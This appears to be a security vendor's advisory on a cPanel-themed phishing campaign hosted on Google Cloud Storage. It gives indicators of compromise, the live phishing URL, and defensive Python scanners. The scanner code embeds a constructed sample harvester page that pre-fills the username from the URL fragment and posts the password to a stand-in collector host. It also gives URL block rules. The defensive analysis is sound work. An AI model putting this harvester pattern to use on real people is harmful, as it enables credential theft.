The CADMUS threat intelligence team has tracked an escalating phishing vector that sidesteps standard gateway filters by abusing public cloud objects. This technical advisory details the inner workings of a cPanel-themed credential harvesting ring actively exploiting Google Cloud Storage infrastructure.
The Anatomy of the Attack
Phase 1: Header Spoofing and Urgency Injection
The attack starts with a highly targeted message delivered via a layout built to mirror cPanel L.L.C.’s internal template designs.
- Subject Vector: Please Confirm To Continue
- From Envelope: Spoofed to match the recipient's organization domain (no-reply@company.com).
- The Bait: The payload claims an account status change requires dynamic revalidation to prevent total loss of company web files and mail flow.
Phase 2: Domain Reputation Evasion
The structural core of this attack relies on abusing trusted public clouds. The embedded CTA points directly to a page layout hosted on a Google storage infrastructure bucket:
https://storage.googleapis.com/binremgroups.com/cPweb86.html#user@company.com
Because storage.googleapis.com is an enterprise domain widely whitelisted for legitimate cloud application usage, conventional security layers struggle to flag it without deep, signature-based content scanning engines.
Gateway Evaluation Flow:
- Inbound Mail Gateway Assessment
- Condition: Link points to a known malicious-domain.com? → [ BLOCK ]
- Condition: Link points to trusted storage.googleapis.com? → [ ALLOW / BYPASS ]
- Downstream Consequence: Security perimeter breached → (Malicious Payload Delivered)
Phase 3: Client-Side DOM Manipulation
Upon analyzing the payload file (cPweb86.html), our laboratory identified several open-source frontend components, including Bootstrap UI, jQuery, and SweetAlert.
The page utilizes the URL fragment identifier (the string following the # symbol). Because the fragment is never sent to the server, it survives in the link untouched; a script on the page reads window.location.hash when the victim lands on the page:
- It extracts the client's email address directly from the #anchor.
- It manipulates the DOM to dynamically populate the user form field.
- It presents a pixel-perfect imitation of a standard Webmail login layout.
Any password entered into this form is exfiltrated to a backend server managed by the threat actors.
Technical Profile & Indicators of Compromise
- Target URL: https://storage.googleapis.com/binremgroups.com/cPweb86.html
- Resolved Threat IP: 142.250.190.251 (Google LLC Autonomous System)
- Classification: Credential Harvester / Phishing Landing Page
- Detected Framework Footprints: Bootstrap UI, SweetAlert JavaScript Alert engine, jQuery
How MailShield Neutralizes This Vector
Traditional security gateways fail here because they rely too heavily on the static reputation of the hostname (storage.googleapis.com) and never look at the bucket and object path beneath it.
MailShield stops this campaign using a layered approach:
- Heuristic Object Analysis: Rather than just scanning the domain name, MailShield inspects path components and queries files for client-side manipulation hooks (such as location hash mapping scripts).
- Outbound Threat Context Mapping: MailShield matches forged metadata values against transactional sending patterns to flag anomalies before delivery.
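The Phase 3 behaviour (a script that reads the fragment and writes it into the login form) and the heuristic object analysis described above can be checked with a small content scanner. The code below is an added example written for this advisory, not MailShield's code and not the payload itself; SAMPLE_PAGE is a constructed stand-in that reproduces only the traits the advisory attributes to cPweb86.html, and scan_page, its regexes and the hypothetical collector.example host are assumptions of the example.

```python
"""Heuristic scan of a fetched landing page for fragment-driven credential prefill.

Added example, not vendor code. It flags the traits described in Phase 3:
a script that reads location.hash, a script that writes a value into a
form field, a password form, and a form that posts to another origin.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page modelled on the described traits; NOT the real payload.
# collector.example is a hypothetical exfiltration host used for illustration.
SAMPLE_PAGE = """
<html><body>
<form id="login" method="post" action="https://collector.example/post.php">
  <input type="text" id="user" name="user">
  <input type="password" name="pass">
  <button>Log in</button>
</form>
<script>
  var id = window.location.hash.substring(1);
  document.getElementById('user').value = id;
</script>
</body></html>
"""


class _Collector(HTMLParser):
    """Collects inline script text, form actions and password inputs."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.form_actions = []
        self.password_inputs = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self.scripts.append(data)


HASH_READ = re.compile(r"location\.hash")      # script reads the #fragment
VALUE_WRITE = re.compile(r"\.value\s*=")         # script writes a form field


def scan_page(html: str, page_host: str) -> dict:
    """Return the individual findings plus a simple verdict for one page."""
    p = _Collector()
    p.feed(html)
    js = "\n".join(p.scripts)
    reads_hash = bool(HASH_READ.search(js))
    writes_field = bool(VALUE_WRITE.search(js))
    # Relative actions (no hostname) post back to the page's own origin.
    off_origin = [a for a in p.form_actions
                  if urlparse(a).hostname and urlparse(a).hostname != page_host]
    findings = {
        "reads_location_hash": reads_hash,
        "writes_form_field": writes_field,
        "password_form": p.password_inputs > 0,
        "off_origin_post": off_origin,
    }
    # Two or more independent signals are treated as a harvester.
    score = sum([reads_hash and writes_field, p.password_inputs > 0, bool(off_origin)])
    findings["verdict"] = "credential-harvester" if score >= 2 else "clean"
    return findings


if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE, "storage.googleapis.com"))
```

The scanner is deliberately conservative: a page that only reads the fragment, or only has a password field, is not condemned on its own, since legitimate single-page applications do both. The combination of a hash-to-field mapping with a password form, or a form that posts to a host other than the one serving the page, is what distinguishes the landing page described here.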
Defenses & Mitigations
If you are not yet running MailShield perimeter defense, we advise enforcing the following system boundaries:
- URL Filtering Rules: Create an explicit infrastructure block rule targeting strings containing storage.googleapis.com/binremgroups.com/.
- Strict SPF/DMARC Enforcement: Implement p=reject or p=quarantine handling to block messages that attempt to spoof your own domain in the envelope sender.
- Session Revocation: If any staff member interacted with this link, immediately terminate all active sessions for that user profile and trigger an administrative password reset.
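The Gateway Evaluation Flow in Phase 2 and the URL Filtering Rules item above describe the same problem from two sides: a hostname-only reputation check waves the link through, while a rule keyed on the host plus bucket/path prefix blocks it. The code below is an added example for this advisory, not MailShield's or any gateway's implementation; the function names are hypothetical, the rule strings come from the advisory, and malicious-domain.com is the placeholder from the evaluation flow, not a real threat domain.

```python
"""Link evaluation for mail-gateway URL rules (added example, not vendor code).

Contrasts the hostname-only check from the Gateway Evaluation Flow with a
check that also matches the bucket/path prefix and inspects the fragment.
"""
import re
from urllib.parse import urlparse, unquote

# Rule data taken from the advisory. malicious-domain.com is the placeholder
# used in the evaluation flow; storage.googleapis.com is the trusted host.
HOST_BLOCKLIST = {"malicious-domain.com"}
PREFIX_BLOCKLIST = ("storage.googleapis.com/binremgroups.com/",)
TRUSTED_HOSTS = {"storage.googleapis.com"}

# Loose e-mail shape; enough to spot a prefill fragment like #user@company.com
EMAIL_RE = re.compile(r"^[^@\s/]+@[^@\s/]+\.[^@\s/]+$")


def host_only_verdict(url: str) -> str:
    """The legacy gateway check: reputation of the hostname alone."""
    host = (urlparse(url).hostname or "").lower()
    if host in HOST_BLOCKLIST:
        return "BLOCK"
    if host in TRUSTED_HOSTS:
        return "ALLOW"
    return "REVIEW"


def gcs_bucket(url: str):
    """For storage.googleapis.com/<bucket>/<object> URLs return the bucket name.

    A bucket named like a domain (binremgroups.com) is still only a bucket
    under Google's hostname; it carries none of that domain's reputation.
    """
    u = urlparse(url)
    if (u.hostname or "").lower() != "storage.googleapis.com":
        return None
    parts = [s for s in u.path.split("/") if s]
    return parts[0] if parts else None


def path_aware_verdict(url: str) -> dict:
    """Match host + path prefix, then look at the fragment for a prefill e-mail."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    # Normalise to "host/path" so an advisory-style rule string matches as a
    # prefix regardless of scheme or percent-encoding.
    host_path = host + unquote(u.path)
    reasons = []
    if host in HOST_BLOCKLIST:
        reasons.append("blocklisted host")
    if any(host_path.startswith(p) for p in PREFIX_BLOCKLIST):
        reasons.append("blocklisted bucket/path prefix")
    if reasons:
        return {"verdict": "BLOCK", "reasons": reasons}
    # Not on a blocklist: an e-mail address in the fragment of a link to a
    # public-cloud object is the prefill pattern, so hold it for content scanning.
    if EMAIL_RE.match(unquote(u.fragment)):
        reasons.append("email address carried in fragment (prefill indicator)")
        return {"verdict": "REVIEW", "reasons": reasons}
    return {"verdict": "ALLOW", "reasons": reasons}


if __name__ == "__main__":
    link = "https://storage.googleapis.com/binremgroups.com/cPweb86.html#user@company.com"
    print("host-only :", host_only_verdict(link))
    print("path-aware:", path_aware_verdict(link))
    print("bucket    :", gcs_bucket(link))
```

Two design points are worth keeping when porting this to a real rule engine: match on the decoded host-plus-path string rather than the raw URL, so percent-encoded variants of the bucket name do not slip past the prefix, and treat the fragment as a signal even though it never reaches the server, because the gateway sees the full link in the message body.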